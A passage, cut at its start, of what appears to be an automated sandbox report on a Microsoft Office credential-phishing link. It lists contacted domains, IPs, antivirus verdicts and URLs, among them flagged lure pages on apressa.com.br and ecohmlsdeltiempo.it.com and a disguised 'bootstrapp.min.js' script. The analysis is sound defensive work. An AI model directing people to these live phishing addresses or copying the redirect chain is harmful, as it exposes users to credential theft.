2C115%2C209%2C208%2C210%2C215%2C216%2C217%2C213%2C205%2C136%2C169%2C204%2C206%2C246%2C172%2C230%2C125%2C163%2C150%2C157%2C133%2C243%2C119%2C131%2C140%2C126%2C201%2C116%2C132%2C138%2C1300%Avira URL Cloudsafe
https://office.com/login0%Avira URL Cloudsafe
https://apressa.com.br/wp-content/uploads/2022/03/favicon-100x100.jpg0%Avira URL Cloudsafe
https://404.ecohmlsdeltiempo.it.com/google.php0%Avira URL Cloudsafe
https://linktube.com/favicon.ico0%Avira URL Cloudsafe
https://connect.facebook.net/signals/config/692479261420616?v=2.9.190&r=stable&domain=linktube.com&hme=c1f2cecb0bd2e60711f2156ceae0254b57f69ec526dbc6c13633615b2168eda4&ex_m=71%2C124%2C109%2C113%2C62%2C4%2C102%2C70%2C16%2C98%2C90%2C51%2C55%2C178%2C181%2C193%2C189%2C190%2C192%2C29%2C103%2C53%2C78%2C191%2C173%2C176%2C186%2C187%2C194%2C135%2C41%2C199%2C196%2C197%2C34%2C148%2C15%2C50%2C203%2C202%2C137%2C18%2C40%2C1%2C43%2C66%2C67%2C68%2C72%2C94%2C17%2C14%2C97%2C93%2C92%2C110%2C52%2C112%2C39%2C111%2C30%2C95%2C26%2C174%2C177%2C145%2C87%2C57%2C85%2C33%2C74%2C0%2C96%2C32%2C28%2C83%2C84%2C89%2C47%2C46%2C88%2C37%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C58%2C63%2C65%2C76%2C54%2C104%2C27%2C77%2C9%2C8%2C81%2C48%2C21%2C106%2C105%2C107%2C99%2C10%2C20%2C3%2C38%2C75%2C19%2C5%2C91%2C82%2C44%2C35%2C86%2C244%2C171%2C122%2C160%2C153%2C2%2C36%2C64%2C42%2C108%2C45%2C80%2C69%2C114%2C61%2C60%2C31%2C100%2C59%2C56%2C49%2C79%2C73%2C24%2C101%2C115%2C209%2C208%2C210%2C215%2C216%2C217%2C213%2C205%2C136%2C169%2C204%2C206%2C246%2C172%2C230%2C125%2C163%2C150%2C157%2C133%2C243%2C119%2C131%2C140%2C126%2C201%2C116%2C132%2C138%2C1300%Avira URL Cloudsafe
https://5382072737-1317754460.cos.ap-bangkok.myqcloud.com/attach%2Fbootstrapp.min.js0%Avira URL Cloudsafe
https://apressa.com.br/favicon.ico0%Avira URL Cloudsafe
https://cdn.jsdelivr.net/npm/workbox-cdn@4.3.1/workbox/workbox-core.prod.js0%Avira URL Cloudsafe
https://cdn.jsdelivr.net/npm/workbox-cdn@4.3.1/workbox/workbox-routing.prod.js0%Avira URL Cloudsafe
https://cdn.jsdelivr.net/npm/workbox-cdn@4.3.1/workbox/workbox-sw.js0%Avira URL Cloudsafe
https://apressa.com.br/offc/1.png0%Avira URL Cloudsafe
https://www.facebook.com/tr/?id=692479261420616&ev=PageView&dl=https%3A%2F%2Flinktube.com%2Fssfuels&rl=&if=false&ts=1743018922224&sw=1280&sh=1024&v=2.9.190&r=stable&ec=0&o=12318&fbp=fb.1.1743018861934.367737420634560964&ler=empty&cdl=API_unavailable&cs_est=true&it=1743018922137&coo=false&rqm=GET0%Avira URL Cloudsafe
https://www.facebook.com/privacy_sandbox/pixel/register/trigger/?id=370162274269334&ev=PageView&dl=https%3A%2F%2Flinktube.com%2Fssfuels&rl=&if=false&ts=1743018922192&sw=1280&sh=1024&v=2.9.190&r=stable&a=tmgoogletagmanager&ec=0&o=12318&fbp=fb.1.1743018861934.367737420634560964&ler=empty&cdl=API_unavailable&it=1743018922137&coo=false&rqm=FGET0%Avira URL Cloudsafe
https://www.facebook.com/tr/?id=370162274269334&ev=PageView&dl=https%3A%2F%2Flinktube.com%2Fssfuels&rl=&if=false&ts=1743018922192&sw=1280&sh=1024&v=2.9.190&r=stable&a=tmgoogletagmanager&ec=0&o=12318&fbp=fb.1.1743018861934.367737420634560964&ler=empty&cdl=API_unavailable&it=1743018922137&coo=false&rqm=GET0%Avira URL Cloudsafe
https://www.facebook.com/privacy_sandbox/pixel/register/trigger/?id=692479261420616&ev=PageView&dl=https%3A%2F%2Flinktube.com%2Fssfuels&rl=&if=false&ts=1743018922224&sw=1280&sh=1024&v=2.9.190&r=stable&ec=0&o=12318&fbp=fb.1.1743018861934.367737420634560964&ler=empty&cdl=API_unavailable&cs_est=true&it=1743018922137&coo=false&rqm=FGET0%Avira URL Cloudsafe
https://www.facebook.com/privacy_sandbox/pixel/register/trigger/?id=138748961041622&ev=PageView&dl=https%3A%2F%2Flinktube.com%2Fssfuels&rl=&if=false&ts=1743018922220&sw=1280&sh=1024&v=2.9.190&r=stable&ec=0&o=12318&fbp=fb.1.1743018861934.367737420634560964&ler=empty&cdl=API_unavailable&cs_est=true&it=1743018922137&coo=false&rqm=FGET0%Avira URL Cloudsafe
https://www.facebook.com/tr/?id=138748961041622&ev=PageView&dl=https%3A%2F%2Flinktube.com%2Fssfuels&rl=&if=false&ts=1743018922220&sw=1280&sh=1024&v=2.9.190&r=stable&ec=0&o=12318&fbp=fb.1.1743018861934.367737420634560964&ler=empty&cdl=API_unavailable&cs_est=true&it=1743018922137&coo=false&rqm=GET0%Avira URL Cloudsafe
https://www.facebook.com/tr/?id=432952554585575&ev=PageView&dl=https%3A%2F%2Flinktube.com%2Fssfuels&rl=&if=false&ts=1743018922221&sw=1280&sh=1024&v=2.9.190&r=stable&ec=0&o=12318&fbp=fb.1.1743018861934.367737420634560964&ler=empty&cdl=API_unavailable&it=1743018922137&coo=false&rqm=GET0%Avira URL Cloudsafe
https://www.facebook.com/privacy_sandbox/pixel/register/trigger/?id=432952554585575&ev=PageView&dl=https%3A%2F%2Flinktube.com%2Fssfuels&rl=&if=false&ts=1743018922221&sw=1280&sh=1024&v=2.9.190&r=stable&ec=0&o=12318&fbp=fb.1.1743018861934.367737420634560964&ler=empty&cdl=API_unavailable&it=1743018922137&coo=false&rqm=FGET0%Avira URL Cloudsafe
https://www.facebook.com/tr/?id=209431097234591&ev=PageView&dl=https%3A%2F%2Flinktube.com%2Fssfuels&rl=&if=false&ts=1743018922178&sw=1280&sh=1024&v=2.9.190&r=stable&a=tmgoogletagmanager&ec=0&o=12318&fbp=fb.1.1743018861934.367737420634560964&ler=empty&cdl=API_unavailable&it=1743018922137&coo=false&rqm=GET0%Avira URL Cloudsafe
https://www.facebook.com/privacy_sandbox/pixel/register/trigger/?id=209431097234591&ev=PageView&dl=https%3A%2F%2Flinktube.com%2Fssfuels&rl=&if=false&ts=1743018922178&sw=1280&sh=1024&v=2.9.190&r=stable&a=tmgoogletagmanager&ec=0&o=12318&fbp=fb.1.1743018861934.367737420634560964&ler=empty&cdl=API_unavailable&it=1743018922137&coo=false&rqm=FGET0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
jsdelivr.map.fastly.net
151.101.45.229
truefalse
    high
    beacons-handoff.gcp.gvt2.com
    142.251.186.94
    truefalse
      high
      hzofjndpntxsowciisqm.ecohmlsdeltiempo.it.com
      104.21.84.118
      truefalse
        unknown
        cos.ap-bangkok.myqcloud.com
        43.128.193.10
        truefalse
          high
          www.tm.a.prd.aadg.trafficmanager.net
          20.190.190.130
          truefalse
            high
            svc.ms-acdc-teams.office.com
            52.123.247.79
            truefalse
              high
              apressa.com.br
              162.241.77.32
              truetrue
                unknown
                scontent.xx.fbcdn.net
                157.240.241.1
                truefalse
                  high
                  code.jquery.com
                  151.101.2.137
                  truefalse
                    high
                    app.factors.ai
                    151.101.1.195
                    truefalse
                      high
                      cdnjs.cloudflare.com
                      104.17.24.14
                      truefalse
                        high
                        office.com
                        13.107.6.156
                        truefalse
                          high
                          stripe.com
                          52.49.17.168
                          truefalse
                            high
                            www.google.com
                            142.250.65.228
                            truefalse
                              high
                              linktube.com
                              104.248.230.249
                              truefalse
                                unknown
                                star-mini.c10r.facebook.com
                                157.240.241.35
                                truefalse
                                  high
                                  stackpath.bootstrapcdn.com
                                  104.18.11.207
                                  truefalse
                                    high
                                    b-0004.b-dc-msedge.net
                                    13.107.9.156
                                    truefalse
                                      high
                                      api.factors.ai
                                      34.160.69.120
                                      truefalse
                                        high
                                        maxcdn.bootstrapcdn.com
                                        104.18.10.207
                                        truefalse
                                          high
                                          beacons.gvt2.com
                                          142.251.116.94
                                          truefalse
                                            high
                                            blog.lenodal.com
                                            213.186.33.16
                                            truetrue
                                              unknown
                                              stripecdn.map.fastly.net
                                              199.232.36.176
                                              truefalse
                                                high
                                                404.ecohmlsdeltiempo.it.com
                                                172.64.80.1
                                                truefalse
                                                  unknown
                                                  api.linktube.com
                                                  104.248.230.249
                                                  truefalse
                                                    unknown
                                                    m.stripe.com
                                                    54.200.22.172
                                                    truefalse
                                                      high
                                                      dexeqbeb7giwr.cloudfront.net
                                                      18.164.96.16
                                                      truefalse
                                                        high
                                                        www.office.com
                                                        unknown
                                                        unknownfalse
                                                          high
                                                          m.stripe.network
                                                          unknown
                                                          unknownfalse
                                                            high
                                                            cdn.jsdelivr.net
                                                            unknown
                                                            unknownfalse
                                                              high
                                                              beacons.gcp.gvt2.com
                                                              unknown
                                                              unknownfalse
                                                                high
                                                                5382072737-1317754460.cos.ap-bangkok.myqcloud.com
                                                                unknown
                                                                unknownfalse
                                                                  unknown
                                                                  www.facebook.com
                                                                  unknown
                                                                  unknownfalse
                                                                    high
                                                                    connect.facebook.net
                                                                    unknown
                                                                    unknownfalse
                                                                      high
                                                                      api.bufferloop.com
                                                                      unknown
                                                                      unknownfalse
                                                                        unknown
                                                                        login.microsoftonline.com
                                                                        unknown
                                                                        unknownfalse
                                                                          high
                                                                          js.stripe.com
                                                                          unknown
                                                                          unknownfalse
                                                                            high
                                                                            NameMaliciousAntivirus DetectionReputation
                                                                            https://apressa.com.br/offc/1.pngfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://linktube.com/api/mefalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://js.stripe.com/v3/fingerprinted/js/m-outer-15a2b40a058ddff1cffdb63779fe3de1.jsfalse
                                                                              high
                                                                              https://www.facebook.com/tr/?id=370162274269334&ev=PageView&dl=https%3A%2F%2Flinktube.com%2Fssfuels&rl=&if=false&ts=1743018922192&sw=1280&sh=1024&v=2.9.190&r=stable&a=tmgoogletagmanager&ec=0&o=12318&fbp=fb.1.1743018861934.367737420634560964&ler=empty&cdl=API_unavailable&it=1743018922137&coo=false&rqm=GETfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://connect.facebook.net/signals/config/370162274269334?v=2.9.190&r=stable&domain=linktube.com&hme=c1f2cecb0bd2e60711f2156ceae0254b57f69ec526dbc6c13633615b2168eda4&ex_m=71%2C124%2C109%2C113%2C62%2C4%2C102%2C70%2C16%2C98%2C90%2C51%2C55%2C178%2C181%2C193%2C189%2C190%2C192%2C29%2C103%2C53%2C78%2C191%2C173%2C176%2C186%2C187%2C194%2C135%2C41%2C199%2C196%2C197%2C34%2C148%2C15%2C50%2C203%2C202%2C137%2C18%2C40%2C1%2C43%2C66%2C67%2C68%2C72%2C94%2C17%2C14%2C97%2C93%2C92%2C110%2C52%2C112%2C39%2C111%2C30%2C95%2C26%2C174%2C177%2C145%2C87%2C57%2C85%2C33%2C74%2C0%2C96%2C32%2C28%2C83%2C84%2C89%2C47%2C46%2C88%2C37%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C58%2C63%2C65%2C76%2C54%2C104%2C27%2C77%2C9%2C8%2C81%2C48%2C21%2C106%2C105%2C107%2C99%2C10%2C20%2C3%2C38%2C75%2C19%2C5%2C91%2C82%2C44%2C35%2C86%2C244%2C171%2C122%2C160%2C153%2C2%2C36%2C64%2C42%2C108%2C45%2C80%2C69%2C114%2C61%2C60%2C31%2C100%2C59%2C56%2C49%2C79%2C73%2C24%2C101%2C115%2C209%2C208%2C210%2C215%2C216%2C217%2C213%2C205%2C136%2C169%2C204%2C206%2C246%2C172%2C230%2C125%2C163%2C150%2C157%2C133%2C243%2C119%2C131%2C140%2C126%2C201%2C116%2C132false
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://www.facebook.com/tr/?id=692479261420616&ev=PageView&dl=https%3A%2F%2Flinktube.com%2Fssfuels&rl=&if=false&ts=1743018922224&sw=1280&sh=1024&v=2.9.190&r=stable&ec=0&o=12318&fbp=fb.1.1743018861934.367737420634560964&ler=empty&cdl=API_unavailable&cs_est=true&it=1743018922137&coo=false&rqm=GETfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://code.jquery.com/jquery-3.2.1.slim.min.jsfalse
                                                                                high
                                                                                https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.13.0/css/brands.min.cssfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://www.facebook.com/privacy_sandbox/pixel/register/trigger/?id=370162274269334&ev=PageView&dl=https%3A%2F%2Flinktube.com%2Fssfuels&rl=&if=false&ts=1743018922192&sw=1280&sh=1024&v=2.9.190&r=stable&a=tmgoogletagmanager&ec=0&o=12318&fbp=fb.1.1743018861934.367737420634560964&ler=empty&cdl=API_unavailable&it=1743018922137&coo=false&rqm=FGETfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://linktube.com/_nuxt/7db29c7d4236cabf432a.jsfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://www.office.com/loginfalse
                                                                                  high
                                                                                  https://linktube.com/_nuxt/manifest.4ba95c29.jsonfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://stripe.com/false
                                                                                    high
                                                                                    https://cdn.jsdelivr.net/gh/pranaynamnaik/files@latest/micro-123787483.pngfalse
                                                                                      high
                                                                                      https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.13.0/css/fontawesome.min.cssfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://linktube.com/_nuxt/fc61e2c5da5fa4b1ee14.jsfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://connect.facebook.net/signals/config/432952554585575?v=2.9.190&r=stable&domain=linktube.com&hme=c1f2cecb0bd2e60711f2156ceae0254b57f69ec526dbc6c13633615b2168eda4&ex_m=71%2C124%2C109%2C113%2C62%2C4%2C102%2C70%2C16%2C98%2C90%2C51%2C55%2C178%2C181%2C193%2C189%2C190%2C192%2C29%2C103%2C53%2C78%2C191%2C173%2C176%2C186%2C187%2C194%2C135%2C41%2C199%2C196%2C197%2C34%2C148%2C15%2C50%2C203%2C202%2C137%2C18%2C40%2C1%2C43%2C66%2C67%2C68%2C72%2C94%2C17%2C14%2C97%2C93%2C92%2C110%2C52%2C112%2C39%2C111%2C30%2C95%2C26%2C174%2C177%2C145%2C87%2C57%2C85%2C33%2C74%2C0%2C96%2C32%2C28%2C83%2C84%2C89%2C47%2C46%2C88%2C37%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C58%2C63%2C65%2C76%2C54%2C104%2C27%2C77%2C9%2C8%2C81%2C48%2C21%2C106%2C105%2C107%2C99%2C10%2C20%2C3%2C38%2C75%2C19%2C5%2C91%2C82%2C44%2C35%2C86%2C244%2C171%2C122%2C160%2C153%2C2%2C36%2C64%2C42%2C108%2C45%2C80%2C69%2C114%2C61%2C60%2C31%2C100%2C59%2C56%2C49%2C79%2C73%2C24%2C101%2C115%2C209%2C208%2C210%2C215%2C216%2C217%2C213%2C205%2C136%2C169%2C204%2C206%2C246%2C172%2C230%2C125%2C163%2C150%2C157%2C133%2C243%2C119%2C131%2C140%2C126%2C201%2C116%2C132%2C138%2C130false
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://www.facebook.com/privacy_sandbox/pixel/register/trigger/?id=692479261420616&ev=PageView&dl=https%3A%2F%2Flinktube.com%2Fssfuels&rl=&if=false&ts=1743018922224&sw=1280&sh=1024&v=2.9.190&r=stable&ec=0&o=12318&fbp=fb.1.1743018861934.367737420634560964&ler=empty&cdl=API_unavailable&cs_est=true&it=1743018922137&coo=false&rqm=FGETfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://linktube.com/api/links/140134/trackfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://m.stripe.network/out-4.5.44.jsfalse
                                                                                        high
                                                                                        https://connect.facebook.net/en_US/fbevents.jsfalse
                                                                                          high
                                                                                          https://www.facebook.com/tr/?id=432952554585575&ev=PageView&dl=https%3A%2F%2Flinktube.com%2Fssfuels&rl=&if=false&ts=1743018922221&sw=1280&sh=1024&v=2.9.190&r=stable&ec=0&o=12318&fbp=fb.1.1743018861934.367737420634560964&ler=empty&cdl=API_unavailable&it=1743018922137&coo=false&rqm=GETfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://www.facebook.com/privacy_sandbox/pixel/register/trigger/?id=432952554585575&ev=PageView&dl=https%3A%2F%2Flinktube.com%2Fssfuels&rl=&if=false&ts=1743018922221&sw=1280&sh=1024&v=2.9.190&r=stable&ec=0&o=12318&fbp=fb.1.1743018861934.367737420634560964&ler=empty&cdl=API_unavailable&it=1743018922137&coo=false&rqm=FGETfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://api.linktube.com/storage/projects/12741/avatars/RotZvuHFZltAXAC1.pngfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://linktube.com/sw.jsfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.13.0/webfonts/fa-brands-400.woff2false
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://js.stripe.com/v3/m-outer-3437aaddcdf6922d623e172c2d6f9278.htmlfalse
                                                                                            high
                                                                                            https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.jsfalse
                                                                                              high
                                                                                              https://app.factors.ai/assets/factors.jsfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhEfalse
                                                                                                high
                                                                                                https://cdn.jsdelivr.net/npm/workbox-cdn@4.3.1/workbox/workbox-strategies.prod.jsfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
                                                                                                https://office.com/loginfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
                                                                                                https://linktube.com/ssfuelstrue
                                                                                                  unknown
                                                                                                  https://linktube.com/_nuxt/85ae7cee2ddbc92082ce.jsfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  https://blog.lenodal.com/exit.php?url=aHR0cHM6Ly9saW5rdHViZS5jb20vc3NmdWVscw==&entry_id=208false
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  https://apressa.com.br/wp-content/uploads/2022/03/favicon-100x100.jpgfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  https://linktube.com/_nuxt/52bce4bcd71977610647.jsfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  https://connect.facebook.net/signals/config/209431097234591?v=2.9.190&r=stable&domain=linktube.com&hme=c1f2cecb0bd2e60711f2156ceae0254b57f69ec526dbc6c13633615b2168eda4&ex_m=71%2C124%2C109%2C113%2C62%2C4%2C102%2C70%2C16%2C98%2C90%2C51%2C55%2C178%2C181%2C193%2C189%2C190%2C192%2C29%2C103%2C53%2C78%2C191%2C173%2C176%2C186%2C187%2C194%2C135%2C41%2C199%2C196%2C197%2C34%2C148%2C15%2C50%2C203%2C202%2C137%2C18%2C40%2C1%2C43%2C66%2C67%2C68%2C72%2C94%2C17%2C14%2C97%2C93%2C92%2C110%2C52%2C112%2C39%2C111%2C30%2C95%2C26%2C174%2C177%2C145%2C87%2C57%2C85%2C33%2C74%2C0%2C96%2C32%2C28%2C83%2C84%2C89%2C47%2C46%2C88%2C37%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C58%2C63%2C65%2C76%2C54%2C104%2C27%2C77%2C9%2C8%2C81%2C48%2C21%2C106%2C105%2C107%2C99%2C10%2C20%2C3%2C38%2C75%2C19%2C5%2C91%2C82%2C44%2C35%2C86%2C244%2C171%2C122%2C160%2C153%2C2%2C36%2C64%2C42%2C108%2C45%2C80%2C69%2C114%2C61%2C60%2C31%2C100%2C59%2C56%2C49%2C79%2C73%2C24%2C101%2C115false
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  https://cdn.jsdelivr.net/npm/workbox-cdn@4.3.1/workbox/workbox-precaching.prod.jsfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  https://hzofjndpntxsowciisqm.ecohmlsdeltiempo.it.com/false
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  https://www.facebook.com/tr/?id=209431097234591&ev=PageView&dl=https%3A%2F%2Flinktube.com%2Fssfuels&rl=&if=false&ts=1743018922178&sw=1280&sh=1024&v=2.9.190&r=stable&a=tmgoogletagmanager&ec=0&o=12318&fbp=fb.1.1743018861934.367737420634560964&ler=empty&cdl=API_unavailable&it=1743018922137&coo=false&rqm=GETfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638786156691492130.MDNmNjcxNDItZDkxMy00YzIwLTkyMGYtM2ZmYWY5MGM0MzI1ZTU5M2IyZTMtZDVmOC00N2MwLTliZWItYjc4MDFhMjI5MDc1&ui_locales=en-US&mkt=en-US&client-request-id=9f85fc14-bc67-4c6a-b4d7-6f6ae37e0f7b&state=xcmXxtfbPduD7crhPV_ThOnlG7wD6YDGYrLGh6j3MNeuKWwBi0O5aWl6j_A-JTE2wEw9y_QFs-x_BAfJKkiVcSAULW2Tuf70IkBm0Y04sR6MB4ZcKizVNnrjf2aoLr_QK_B2vPkRjrXIN3RJ-IobP92ZDoHp3WRLjBQJ0XukOSPR-H91w_44dqqMKUjpup0yjziOr_CKm7F6M9XcIs1zraqkuCyp_hjByx-MWmyhf6kfS9we6P56Wi0Hqgq4BdHDTm-XHTrS-1I9M6wO22bazQ&x-client-SKU=ID_NET8_0&x-client-ver=8.5.0.0false
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  https://404.ecohmlsdeltiempo.it.com/google.phpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.jsfalse
                                                                                                    high
                                                                                                    https://www.facebook.com/privacy_sandbox/pixel/register/trigger/?id=209431097234591&ev=PageView&dl=https%3A%2F%2Flinktube.com%2Fssfuels&rl=&if=false&ts=1743018922178&sw=1280&sh=1024&v=2.9.190&r=stable&a=tmgoogletagmanager&ec=0&o=12318&fbp=fb.1.1743018861934.367737420634560964&ler=empty&cdl=API_unavailable&it=1743018922137&coo=false&rqm=FGETfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://connect.facebook.net/signals/config/138748961041622?v=2.9.190&r=stable&domain=linktube.com&hme=c1f2cecb0bd2e60711f2156ceae0254b57f69ec526dbc6c13633615b2168eda4&ex_m=71%2C124%2C109%2C113%2C62%2C4%2C102%2C70%2C16%2C98%2C90%2C51%2C55%2C178%2C181%2C193%2C189%2C190%2C192%2C29%2C103%2C53%2C78%2C191%2C173%2C176%2C186%2C187%2C194%2C135%2C41%2C199%2C196%2C197%2C34%2C148%2C15%2C50%2C203%2C202%2C137%2C18%2C40%2C1%2C43%2C66%2C67%2C68%2C72%2C94%2C17%2C14%2C97%2C93%2C92%2C110%2C52%2C112%2C39%2C111%2C30%2C95%2C26%2C174%2C177%2C145%2C87%2C57%2C85%2C33%2C74%2C0%2C96%2C32%2C28%2C83%2C84%2C89%2C47%2C46%2C88%2C37%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C58%2C63%2C65%2C76%2C54%2C104%2C27%2C77%2C9%2C8%2C81%2C48%2C21%2C106%2C105%2C107%2C99%2C10%2C20%2C3%2C38%2C75%2C19%2C5%2C91%2C82%2C44%2C35%2C86%2C244%2C171%2C122%2C160%2C153%2C2%2C36%2C64%2C42%2C108%2C45%2C80%2C69%2C114%2C61%2C60%2C31%2C100%2C59%2C56%2C49%2C79%2C73%2C24%2C101%2C115%2C209%2C208%2C210%2C215%2C216%2C217%2C213%2C205%2C136%2C169%2C204%2C206%2C246%2C172%2C230%2C125%2C163%2C150%2C157%2C133%2C243%2C119%2C131%2C140%2C126%2C201%2C116%2C132false
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://m.stripe.network/inner.htmlfalse
                                                                                                      high
                                                                                                      https://apressa.com.br/offc/scg.html?utm_medium=social&utm_source=&utm_campaign=Access+with+Outlook+or+Officetrue
                                                                                                        unknown
                                                                                                        https://api.factors.ai/sdk/get_infofalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.13.0/css/solid.min.cssfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        https://linktube.com/favicon.icofalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.cssfalse
                                                                                                          high
                                                                                                          https://www.facebook.com/privacy_sandbox/pixel/register/trigger/?id=138748961041622&ev=PageView&dl=https%3A%2F%2Flinktube.com%2Fssfuels&rl=&if=false&ts=1743018922220&sw=1280&sh=1024&v=2.9.190&r=stable&ec=0&o=12318&fbp=fb.1.1743018861934.367737420634560964&ler=empty&cdl=API_unavailable&cs_est=true&it=1743018922137&coo=false&rqm=FGETfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          https://connect.facebook.net/signals/config/692479261420616?v=2.9.190&r=stable&domain=linktube.com&hme=c1f2cecb0bd2e60711f2156ceae0254b57f69ec526dbc6c13633615b2168eda4&ex_m=71%2C124%2C109%2C113%2C62%2C4%2C102%2C70%2C16%2C98%2C90%2C51%2C55%2C178%2C181%2C193%2C189%2C190%2C192%2C29%2C103%2C53%2C78%2C191%2C173%2C176%2C186%2C187%2C194%2C135%2C41%2C199%2C196%2C197%2C34%2C148%2C15%2C50%2C203%2C202%2C137%2C18%2C40%2C1%2C43%2C66%2C67%2C68%2C72%2C94%2C17%2C14%2C97%2C93%2C92%2C110%2C52%2C112%2C39%2C111%2C30%2C95%2C26%2C174%2C177%2C145%2C87%2C57%2C85%2C33%2C74%2C0%2C96%2C32%2C28%2C83%2C84%2C89%2C47%2C46%2C88%2C37%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C58%2C63%2C65%2C76%2C54%2C104%2C27%2C77%2C9%2C8%2C81%2C48%2C21%2C106%2C105%2C107%2C99%2C10%2C20%2C3%2C38%2C75%2C19%2C5%2C91%2C82%2C44%2C35%2C86%2C244%2C171%2C122%2C160%2C153%2C2%2C36%2C64%2C42%2C108%2C45%2C80%2C69%2C114%2C61%2C60%2C31%2C100%2C59%2C56%2C49%2C79%2C73%2C24%2C101%2C115%2C209%2C208%2C210%2C215%2C216%2C217%2C213%2C205%2C136%2C169%2C204%2C206%2C246%2C172%2C230%2C125%2C163%2C150%2C157%2C133%2C243%2C119%2C131%2C140%2C126%2C201%2C116%2C132%2C138%2C130false
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          https://www.facebook.com/.well-known/attribution-reporting/debug/verbosefalse
                                                                                                            high
                                                                                                            https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.jsfalse
                                                                                                              high
                                                                                                              https://js.stripe.com/v3/false
                                                                                                                high
                                                                                                                https://linktube.com/_nuxt/e114ae80e4b2d47f2989.jsfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                https://apressa.com.br/favicon.icofalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                https://cdn.jsdelivr.net/npm/workbox-cdn@4.3.1/workbox/workbox-sw.jsfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                https://cdn.jsdelivr.net/npm/workbox-cdn@4.3.1/workbox/workbox-core.prod.jsfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                https://cdn.jsdelivr.net/npm/workbox-cdn@4.3.1/workbox/workbox-routing.prod.jsfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                https://m.stripe.com/6false
                                                                                                                  high
                                                                                                                  https://linktube.com/api/pages/20701/trackfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  https://5382072737-1317754460.cos.ap-bangkok.myqcloud.com/attach%2Fbootstrapp.min.jsfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  https://linktube.com/_nuxt/30e4908824f75617b76a.jsfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.2.0/crypto-js.min.jsfalse
                                                                                                                    high
